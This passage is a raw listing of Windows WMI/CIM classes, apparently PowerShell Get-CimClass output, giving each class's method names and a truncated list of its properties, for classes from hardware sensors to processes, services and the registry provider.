Description...}\nWin32_BindImageAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_RemoveIniAction {Invoke} {Action, ActionID, Caption, Description...}\nWin32_MIMEInfoAction {Invoke} {ActionID, Caption, CLSID, ContentType...}\nWin32_FontInfoAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_PublishComponentAction {Invoke} {ActionID, AppData, Caption, ComponentID...}\nCIM_FileAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_MoveFileAction {Invoke} {ActionID, Caption, Description, DestFolder...}\nCIM_CopyFileAction {Invoke} {ActionID, Caption, DeleteAfterCopy, Description...}\nWin32_DuplicateFileAction {Invoke} {ActionID, Caption, DeleteAfterCopy, Description...}\nCIM_RemoveFileAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_RemoveFileAction {Invoke} {ActionID, Caption, Description, Direction...}\nWin32_ProductResource {} {Product, Resource}\nWin32_FolderRedirectionHealth {} {HealthStatus, LastSuccessfulSyncTime, LastSyncStatus, LastSyncTime...}\nWin32_MountPoint {} {Directory, Volume}\nCIM_Statistics {} {Element, Stats}\nCIM_ErrorCountersForDevice {} {Element, Stats}\nMsft_Providers {Suspend, Resume,... {HostingGroup, HostingSpecification, HostProcessIdentifier, Locale...}\nWin32_UserProfile {ChangeOwner} {AppDataRoaming, Contacts, Desktop, Documents...}\nCIM_RelatedStatistics {} {RelatedStats, Stats}\nCIM_Export {} {Directory, ExportedDirectoryName, LocalFS}\nWin32_RoamingProfileMachineConfi... {} {AddAdminGroupToRUPEnabled, AllowCrossForestUserPolicy, BackgroundUploadParams, DeleteProfilesOlderDays...}\nWin32_ManagedSystemElementResource {} {}\nWin32_SoftwareElementResource {} {Element, Setting}\nCIM_FRUPhysicalElements {} {Component, FRU}\nCIM_ParticipatesInSet {} {Element, Set}\nCIM_FromDirectoryAction {} {FileName, SourceDirectory}\nWin32_SID {} {AccountName, BinaryRepresentation, ReferencedDomainName, SID...}\nCIM_ElementCapacity {} {Capacity, Element}\nWin32_ActionCheck {} {Action, Check}\nCIM_ElementSetting {} {Element, Setting}\nWin32_UserDesktop {} {Element, Setting}\nCIM_MonitorSetting {} {Element, Setting}\nWin32_DeviceSettings {} {Element, Setting}\nWin32_PrinterSetting {} {Element, Setting}\nWin32_NetworkAdapterSetting {} {Element, Setting}\nWin32_SerialPortSetting {} {Element, Setting}\nWin32_SystemSetting {} {Element, Setting}\nWin32_SystemProgramGroups {} {Element, Setting}\nWin32_SystemBootConfiguration {} {Element, Setting}\nWin32_SystemTimeZone {} {Element, Setting}\nWin32_SystemDesktop {} {Element, Setting}\nWin32_ClassicCOMClassSettings {} {Element, Setting}\nWin32_VolumeQuota {} {Element, Setting}\nWin32_WMIElementSetting {} {Element, Setting}\nWin32_COMApplicationSettings {} {Element, Setting}\nCIM_VideoSetting {} {Element, Setting}\nWin32_VideoSettings {} {Element, Setting}\nWin32_SecuritySettingOfObject {} {Element, Setting}\nWin32_SecuritySettingOfLogicalShare {} {Element, Setting}\nWin32_SecuritySettingOfLogicalFile {} {Element, Setting}\nWin32_PageFileElementSetting {} {Element, Setting}\nWin32_OperatingSystemAutochkSetting {} {Element, Setting}\nWin32_VolumeQuotaSetting {} {Element, Setting}\nCIM_ToDirectorySpecification {} {DestinationDirectory, FileName}\nCIM_ProductSoftwareFeatures {} {Component, Product}\nWin32_ProductSoftwareFeatures {} {Component, Product}\nWin32_ImplementedCategory {} {Category, Component}\nWin32_RoamingProfileUserConfigur... {} {DirectoriesToSyncAtLogonLogoff, ExcludedProfileDirs, IsConfiguredByWMI}\nCIM_InstalledSoftwareElement {} {Software, System}\nWin32_InstalledSoftwareElement {} {Software, System}\nWin32_SoftwareFeatureCheck {} {Check, Element}\nWin32_LUIDandAttributes {} {Attributes, LUID}\nWin32_VolumeUserQuota {} {Account, DiskSpaceUsed, Limit, Status...}\nMsft_WmiProvider_Counters {} {ProviderOperation_AccessCheck, ProviderOperation_CancelQuery, ProviderOperation_CreateClassEnumAsync, ProviderOperation_CreateInstanceEnumAsy...\nWin32_LUID {} {HighPart, LowPart}\nCIM_Check {Invoke} {Caption, CheckID, CheckMode, Description...}\nCIM_DiskSpaceCheck {Invoke} {AvailableDiskSpace, Caption, CheckID, CheckMode...}\nCIM_DirectorySpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_DirectorySpecification {Invoke} {Caption, CheckID, CheckMode, DefaultDir...}\nWin32_SoftwareElementCondition {Invoke} {Caption, CheckID, CheckMode, Condition...}\nWin32_ODBCDriverSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nCIM_MemoryCheck {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_ServiceSpecification {Invoke} {Caption, CheckID, CheckMode, Dependencies...}\nCIM_FileSpecification {Invoke} {Caption, CheckID, CheckMode, CheckSum...}\nWin32_FileSpecification {Invoke} {Attributes, Caption, CheckID, CheckMode...}\nWin32_IniFileSpecification {Invoke} {Action, Caption, CheckID, CheckMode...}\nCIM_SoftwareElementVersionCheck {Invoke} {Caption, CheckID, CheckMode, Description...}\nCIM_SettingCheck {Invoke} {Caption, CheckID, CheckMode, CheckType...}\nWin32_LaunchCondition {Invoke} {Caption, CheckID, CheckMode, Condition...}\nWin32_ODBCDataSourceSpecification {Invoke} {Caption, CheckID, CheckMode, DataSource...}\nWin32_ODBCTranslatorSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_ProgIDSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nCIM_SwapSpaceCheck {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_EnvironmentSpecification {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_ReserveCost {Invoke} {Caption, CheckID, CheckMode, Description...}\nCIM_VersionCompatibilityCheck {Invoke} {AllowDownVersion, AllowMultipleVersions, Caption, CheckID...}\nCIM_OSVersionCheck {Invoke} {Caption, CheckID, CheckMode, Description...}\nWin32_Condition {Invoke} {Caption, CheckID, CheckMode, Condition...}\nCIM_ProductFRU {} {FRU, Product}\nWin32_ShadowStorage {Create} {AllocatedSpace, DiffVolume, MaxSpace, UsedSpace...}\nWin32_DCOMApplicationAccessAllow... {} {Element, Setting}\nStdRegProv {CreateKey, Delet... {}\nCIM_FRUIncludesProduct {} {Component, FRU}\nWin32_FolderRedirection {} {ContentsMoved, ContentsMovedOnPolicyRemoval, ContentsRenamedInLocalCache, ExclusiveRightsGranted...}\nCIM_ProductPhysicalElements {} {Component, Product}\nCIM_CollectedMSEs {} {Collection, Member}\nWin32_NamedJobObjectProcess {} {Collection, Member}\nCIM_PhysicalElementLocation {} {Element, PhysicalLocation}\nWin32_TokenPrivileges {} {PrivilegeCount, Privileges}\nCIM_CollectionOfMSEs {} {Caption, CollectionID, Description}\nWin32_NamedJobObject {} {BasicUIRestrictions, Caption, CollectionID, Description}\nCIM_FromDirectorySpecification {} {FileName, SourceDirectory}\nWin32_PnPDevice {} {SameElement, SystemElement}\nCIM_StorageError {} {DeviceCreationClassName, DeviceID, EndingAddress, StartingAddress...}\nWin32_ServiceSpecificationService {} {Check, Element}\nWin32_ShareToDirectory {} {Share, SharedElement}\nWin32_SettingCheck {} {Check, Setting}\nWin32_PatchFile {} {Check, Setting}\nWin32_ODBCDriverAttribute {} {Check, Setting}\nWin32_ODBCDataSourceAttribute {} {Check, Setting}\nWin32_ClientApplicationSetting {} {Application, Client}\nCIM_ElementConfiguration {} {Configuration, Element}\nWin32_RoamingUserHealthConfigura... {} {HealthStatusForTempProfiles, LastProfileDownloadIntervalCautionInHours, LastProfileDownloadIntervalUnhealthyInHours, LastProfileUploadInterva...\nCIM_ReplacementSet {} {Description, Name}\nWin32_UserStateConfigurationCont... {} {FolderRedirection, OfflineFiles, RoamingUserProfile}\nWin32_ServerFeature {} {ID, Name, ParentID}\nCIM_DirectorySpecificationFile {} {DirectorySpecification, FileSpecification}\nCIM_SettingContext {} {Context, Setting}\nWin32_SecuritySettingOwner {} {Owner, SecuritySetting}\nWin32_LogicalFileOwner {} {Owner, SecuritySetting}\nCIM_ManagedSystemElement {} {Caption, Description, InstallDate, Name...}\nCIM_PhysicalElement {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_PhysicalComponent {} {Caption, CreationClassName, Description, HotSwappable...}\nCIM_PhysicalMedia {} {Capacity, Caption, CleanerMedia, CreationClassName...}\nWin32_PhysicalMedia {} {Capacity, Caption, CleanerMedia, CreationClassName...}\nCIM_Chip {} {Caption, CreationClassName, Description, FormFactor...}\nCIM_PhysicalMemory {} {BankLabel, Capacity, Caption, CreationClassName...}\nWin32_PhysicalMemory {} {BankLabel, Capacity, Caption, CreationClassName...}\nWin32_OnBoardDevice {} {Caption, CreationClassName, Description, DeviceType...}\nCIM_PhysicalPackage {IsCompatible} {Caption, CreationClassName, Depth, Description...}\nCIM_Card {IsCompatible} {Caption, CreationClassName, Depth, Description...}\nWin32_BaseBoard {IsCompatible} {Caption, ConfigOptions, CreationClassName, Depth...}\nCIM_PhysicalFrame {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...}\nCIM_Rack {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...}\nCIM_Chassis {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...}\nWin32_SystemEnclosure {IsCompatible} {AudibleAlarm, BreachDescription, CableManagementStrategy, Caption...}\nWin32_PhysicalMemoryArray {IsCompatible} {Caption, CreationClassName, Depth, Description...}\nCIM_PhysicalConnector {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...}\nCIM_Slot {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...}\nWin32_SystemSlot {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...}\nWin32_PortConnector {} {Caption, ConnectorPinout, ConnectorType, CreationClassName...}\nCIM_PhysicalLink {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_LogicalElement {} {Caption, Description, InstallDate, Name...}\nCIM_Thread {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_Thread {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_COMApplication {} {Caption, Description, InstallDate, Name...}\nWin32_DCOMApplication {} {AppID, Caption, Description, InstallDate...}\nCIM_Job {} {Caption, Description, ElapsedTime, InstallDate...}\nWin32_ScheduledJob {Create, Delete} {Caption, Command, DaysOfMonth, DaysOfWeek...}\nWin32_PrintJob {Pause, Resume} {Caption, Color, DataType, Description...}\nWin32_ServerSession {} {ActiveTime, Caption, ClientType, ComputerName...}\nCIM_System {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_ComputerSystem {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_UnitaryComputerSystem {SetPowerState} {Caption, CreationClassName, Description, InitialLoadInfo...}\nWin32_ComputerSystem {SetPowerState, R... {AdminPasswordStatus, AutomaticManagedPagefile, AutomaticResetBootOption, AutomaticResetCapability...}\nCIM_ApplicationSystem {} {Caption, CreationClassName, Description, InstallDate...}\nWin32_NTDomain {} {Caption, ClientSiteName, CreationClassName, DcSiteName...}\nCIM_SoftwareFeature {} {Caption, Description, IdentifyingNumber, InstallDate...}\nWin32_SoftwareFeature {Reinstall, Confi... {Accesses, Attributes, Caption, Description...}\nCIM_VideoBIOSFeature {} {Caption, CharacteristicDescriptions, Characteristics, Description...}\nCIM_BIOSFeature {} {Caption, CharacteristicDescriptions, Characteristics, Description...}\nCIM_LogicalDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_Sensor {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_BinarySensor {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_MultiStateSensor {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_DiscreteSensor {SetPowerState, R... {AcceptableValues, Availability, Caption, ConfigManagerErrorCode...}\nCIM_NumericSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nCIM_TemperatureSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nWin32_TemperatureProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nCIM_Tachometer {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nCIM_VoltageSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nWin32_VoltageProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nCIM_CurrentSensor {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nWin32_CurrentProbe {SetPowerState, R... {Accuracy, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Bus {SetPowerState, R... {Availability, BusNum, BusType, Caption...}\nCIM_UserDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_Keyboard {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_Keyboard {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_Display {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_FlatPanel {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_DesktopMonitor {SetPowerState, R... {Availability, Bandwidth, Caption, ConfigManagerErrorCode...}\nWin32_DesktopMonitor {SetPowerState, R... {Availability, Bandwidth, Caption, ConfigManagerErrorCode...}\nCIM_PointingDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_PointingDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_USBDevice {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...}\nCIM_USBHub {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...}\nWin32_USBHub {SetPowerState, R... {Availability, Caption, ClassCode, ConfigManagerErrorCode...}\nCIM_NetworkAdapter {SetPowerState, R... {AutoSense, Availability, Caption, ConfigManagerErrorCode...}\nWin32_NetworkAdapter {SetPowerState, R... {AdapterType, AdapterTypeId, AutoSense, Availability...}\nCIM_AlarmDevice {SetPowerState, R... {AudibleAlarm, Availability, Caption, ConfigManagerErrorCode...}\nCIM_Battery {SetPowerState, R... {Availability, BatteryStatus, Caption, Chemistry...}\nWin32_Battery {SetPowerState, R... {Availability, BatteryRechargeTime, BatteryStatus, Caption...}\nWin32_PortableBattery {SetPowerState, R... {Availability, BatteryStatus, CapacityMultiplier, Caption...}\nWin32_SoundDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_MotherboardDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_PowerSupply {SetPowerState, R... {ActiveInputVoltage, Availability, Caption, ConfigManagerErrorCode...}\nCIM_UninterruptiblePowerSupply {SetPowerState, R... {ActiveInputVoltage, Availability, Caption, ConfigManagerErrorCode...}\nCIM_MediaAccessDevice {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nCIM_DiskDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_DiskDrive {SetPowerState, R... {Availability, BytesPerSector, Capabilities, CapabilityDescriptions...}\nCIM_DisketteDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_FloppyDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nCIM_TapeDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_TapeDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nCIM_MagnetoOpticalDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nCIM_CDROMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_CDROMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nCIM_WORMDrive {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nCIM_Scanner {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_PnPEntity {SetPowerState, R... {Availability, Caption, ClassGuid, CompatibleID...}\nCIM_PotsModem {SetPowerState, R... {AnswerMode, Availability, Caption, CompressionInfo...}\nWin32_POTSModem {SetPowerState, R... {AnswerMode, AttachedTo, Availability, BlindOff...}\nCIM_CoolingDevice {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nCIM_HeatPipe {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nWin32_HeatPipe {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nCIM_Refrigeration {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Refrigeration {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nCIM_Fan {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Fan {SetPowerState, R... {ActiveCooling, Availability, Caption, ConfigManagerErrorCode...}\nCIM_Printer {SetPowerState, R... {Availability, AvailableJobSheets, Capabilities, CapabilityDescriptions...}\nWin32_Printer {SetPowerState, R... {Attributes, Availability, AvailableJobSheets, AveragePagesPerMinute...}\nCIM_Controller {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_ManagementController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_SCSIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_SCSIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_InfraredController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_InfraredDevice {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_PCIController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_PCMCIAController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_PCMCIAController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_FloppyController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_VideoController {SetPowerState, R... {AcceleratorCapabilities, Availability, CapabilityDescriptions, Caption...}\nCIM_PCVideoController {SetPowerState, R... {AcceleratorCapabilities, Availability, CapabilityDescriptions, Caption...}\nWin32_VideoController {SetPowerState, R... {AcceleratorCapabilities, AdapterCompatibility, AdapterDACType, AdapterRAM...}\nCIM_USBController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_USBController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_SerialController {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_SerialPort {SetPowerState, R... {Availability, Binary, Capabilities, CapabilityDescriptions...}\nCIM_ParallelController {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_ParallelPort {SetPowerState, R... {Availability, Capabilities, CapabilityDescriptions, Caption...}\nWin32_IDEController {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nWin32_1394Controller {SetPowerState, R... {Availability, Caption, ConfigManagerErrorCode, ConfigManagerUserConfig...}\nCIM_StorageExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nCIM_Memory {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nCIM_VolatileStorage {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nCIM_NonVolatileStorage {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nCIM_CacheMemory {SetPowerState, R... {Access, AdditionalErrorData, Associativity, Availability...}\nWin32_CacheMemory {SetPowerState, R... {Access, AdditionalErrorData, Associativity, Availability...}\nCIM_StorageVolume {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nWin32_Volume {SetPowerState, R... {Access, Automount, Availability, BlockSize...}\nCIM_PhysicalExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nWin32_SMBIOSMemory {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nWin32_MemoryArray {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nWin32_MemoryDevice {SetPowerState, R... {Access, AdditionalErrorData, Availability, BlockSize...}\nCIM_ProtectedSpaceExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nCIM_AggregatePSExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nCIM_AggregatePExtent {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nCIM_VolumeSet {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nCIM_LogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nWin32_LogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nWin32_MappedLogicalDisk {SetPowerState, R... {Access, Availability, BlockSize, Caption...}\nCIM_DiskPartition {SetPowerState, R... {Access, Availability, BlockSize, Bootable...}\nWin32_DiskPartition {SetPowerState, R... {Access, Availability, BlockSize, Bootable...}\nCIM_Processor {SetPowerState, R... {AddressWidth, Availability, Caption, ConfigManagerErrorCode...}\nWin32_Processor {SetPowerState, R... {AddressWidth, Architecture, Availability, Caption...}\nWin32_OptionalFeature {} {Caption, Description, InstallDate, InstallState...}\nWin32_DfsNode {Create} {Caption, Description, InstallDate, Name...}\nWin32_ComponentCategory {} {Caption, CategoryId, Description, InstallDate...}\nWin32_ProgramGroupOrItem {} {Caption, Description, InstallDate, Name...}\nWin32_LogicalProgramGroupItem {} {Caption, Description, InstallDate, Name...}\nWin32_LogicalProgramGroup {} {Caption, Description, GroupName, InstallDate...}\nWin32_NetworkConnection {} {AccessMask, Caption, Comment, ConnectionState...}\nWin32_COMClass {} {Caption, Description, InstallDate, Name...}\nWin32_ClassicCOMClass {} {Caption, ComponentId, Description, InstallDate...}\nWin32_Account {} {Caption, Description, Domain, InstallDate...}\nWin32_UserAccount {Rename} {AccountType, Caption, Description, Disabled...}\nWin32_Group {Rename} {Caption, Description, Domain, InstallDate...}\nWin32_SystemAccount {} {Caption, Description, Domain, InstallDate...}\nCIM_Service {StartService, St... {Caption, CreationClassName, Description, InstallDate...}\nWin32_BaseService {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...}\nWin32_SystemDriver {StartService, St... {AcceptPause, AcceptStop, Caption, CreationClassName...}\nWin32_Service {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...}\nWin32_TerminalService {StartService, St... {AcceptPause, AcceptStop, Caption, CheckPoint...}\nCIM_BootService {StartService, St... {Caption, CreationClassName, Description, InstallDate...}\nWin32_PnPSignedDriver {StartService, St... {Caption, ClassGuid, CompatID, CreationClassName...}\nCIM_ClusteringService {StartService, St... {Caption, CreationClassName, Description, InstallDate...}\nWin32_ApplicationService {StartService, St... {Caption, CreationClassName, Description, InstallDate...}\nWin32_PrinterDriver {StartService, St... {Caption, ConfigFile, CreationClassName, DataFile...}\nCIM_ServiceAccessPoint {} {Caption, CreationClassName, Description, InstallDate...}\nWin32_TCPIPPrinterPort {} {ByteCount, Caption, CreationClassName, Description...}\nCIM_ClusteringSAP {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_BootSAP {} {Caption, CreationClassName, Description, InstallDate...}\nWin32_CommandLineAccess {} {Caption, CommandLine, CreationClassName, Description...}\nCIM_SystemResource {} {Caption, Description, InstallDate, Name...}\nCIM_MemoryMappedIO {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_SystemMemoryResource {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_PortResource {} {Alias, Caption, CreationClassName, CSCreationClassName...}\nWin32_DeviceMemoryAddress {} {Caption, CreationClassName, CSCreationClassName, CSName...}\nCIM_IRQ {} {Availability, Caption, CreationClassName, CSCreationClassName...}\nWin32_IRQResource {} {Availability, Caption, CreationClassName, CSCreationClassName...}\nWin32_Environment {} {Caption, Description, InstallDate, Name...}\nCIM_DMA {} {AddressSize, Availability, BurstMode, ByteMode...}\nWin32_DMAChannel {} {AddressSize, Availability, BurstMode, ByteMode...}\nWin32_Share {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...}\nWin32_ClusterShare {Create, SetShare... {AccessMask, AllowMaximum, Caption, Description...}\nCIM_FileSystem {} {AvailableSpace, BlockSize, Caption, CasePreserved...}\nCIM_RemoteFileSystem {} {AvailableSpace, BlockSize, Caption, CasePreserved...}\nCIM_NFS {} {AttributeCaching, AttributeCachingForDirectoriesMax, AttributeCachingForDirectoriesMin, AttributeCachingForRegularFilesMax...}\nCIM_LocalFileSystem {} {AvailableSpace, BlockSize, Caption, CasePreserved...}\nWin32_NetworkProtocol {} {Caption, ConnectionlessService, Description, GuaranteesDelivery...}\nWin32_ShadowProvider {} {Caption, CLSID, Description, ID...}\nCIM_RedundancyGroup {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_ExtraCapacityGroup {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_StorageRedundancyGroup {} {Caption, CreationClassName, Description, InstallDate...}\nCIM_SpareGroup {} {Caption, CreationClassName, Description, InstallDate...}\nWin32_QuickFixEngineering {} {Caption, CSName, Description, FixComments...}\nWin32_IP4RouteTable {} {Age, Caption, Description, Destination...}\nWin32_ShadowCopy {Create, Revert} {Caption, ClientAccessible, Count, Description...}\nWin32_LoadOrderGroup {} {Caption, Description, DriverEnabled, GroupOrder...}\nCIM_Process {} {Caption, CreationClassName, CreationDate, CSCreationClassName...}\nWin32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...}\nWin32_Session {} {Caption, Description, InstallDate, Name...}\nWin32_LogonSession {} {AuthenticationPackage, Caption, Description, InstallDate...}\nWin32_ServerConnection {} {ActiveTime, Caption, ComputerName, ConnectionID...}\nCIM_JobDestination {} {Caption, CreationClassName, Description, InstallDate...}\nWin32_DfsTarget {} {Caption, Description, InstallDate, LinkName...}\nWin32_NetworkClient {} {Caption, Description, InstallDate, Manufacturer...}\nWin32_PageFileUsage {} {AllocatedBaseSize, Caption, CurrentUsage, Description...}\nCIM_OperatingSystem {Reboot, Shutdown} {Caption, CreationClassName, CSCreationClassName, CSName...}\nWin32_OperatingSystem {Reboot, Shutdown... {BootDevice, BuildNumber, BuildType, Caption...}\nCIM_LogicalFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nCIM_Directory {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_Directory {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nCIM_DeviceFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nCIM_DataFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_ShortcutFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_CodecFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_NTEventlogFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_PageFile {TakeOwnerShip, C... {AccessMask, Archive, Caption, Compressed...}\nWin32_IP4PersistedRouteTable {} {Caption, Description, Destination, InstallDate...}\nWin32_Registry {} {Caption, CurrentSize, Description, InstallDate...}\nCIM_SoftwareElement {} {BuildNumber, Caption, CodeSet, Description...}\nCIM_BIOSElement {} {BuildNumber, Caption, CodeSet, Description...}\nWin32_BIOS {} {BiosCharacteristics, BIOSVersion, BuildNumber, Caption...}\nWin32_SoftwareElement {} {Attributes, BuildNumber, Caption, CodeSet...}\nCIM_VideoBIOSElement {} {BuildNumber, Caption, CodeSet, Description...}\nNTEventlogProviderConfig {} {LastBootUpTime}\nWin32_ShortcutSAP {} {Action, Element}\nWin32_MethodParameterClass {} {}\nWin32_ProcessStartup {} {CreateFlags, EnvironmentVariables, ErrorMode, FillAttribute...}\nWin32_PingStatus {} {Address, BufferSize, NoFragmentation, PrimaryAddressResolutionStatus...}\nCIM_ProductSupport {} {Product, Support}\nCIM_AdjacentSlots {} {DistanceBetweenSlots, SharedSlots, SlotA, SlotB}\nCIM_SoftwareElementChecks {} {Check, Element, Phase}\nWin32_SoftwareElementCheck {} {Check, Element, Phase}\nWin32_ODBCDriverSoftwareElement {} {Check, Element, Phase}\nCIM_Component {} {GroupComponent, PartComponent}\nCIM_SystemComponent {} {GroupComponent, PartComponent}\nWin32_SystemServices {} {GroupComponent, PartComponent}\nWin32_SystemNetworkConnections {} {GroupComponent, PartComponent}\nCIM_HostedFileSystem {} {GroupComponent, PartComponent}\nCIM_ComputerSystemResource {} {GroupComponent, PartComponent}\nWin32_SystemResources {} {GroupComponent, PartComponent}\nCIM_ComputerSystemMappedIO {} {GroupComponent, PartComponent}\nCIM_ComputerSystemDMA {} {GroupComponent, PartComponent}\nCIM_ComputerSystemIRQ {} {GroupComponent, PartComponent}\nWin32_SystemBIOS {} {GroupComponent, PartComponent}\nWin32_SystemLoadOrderGroups {} {GroupComponent, 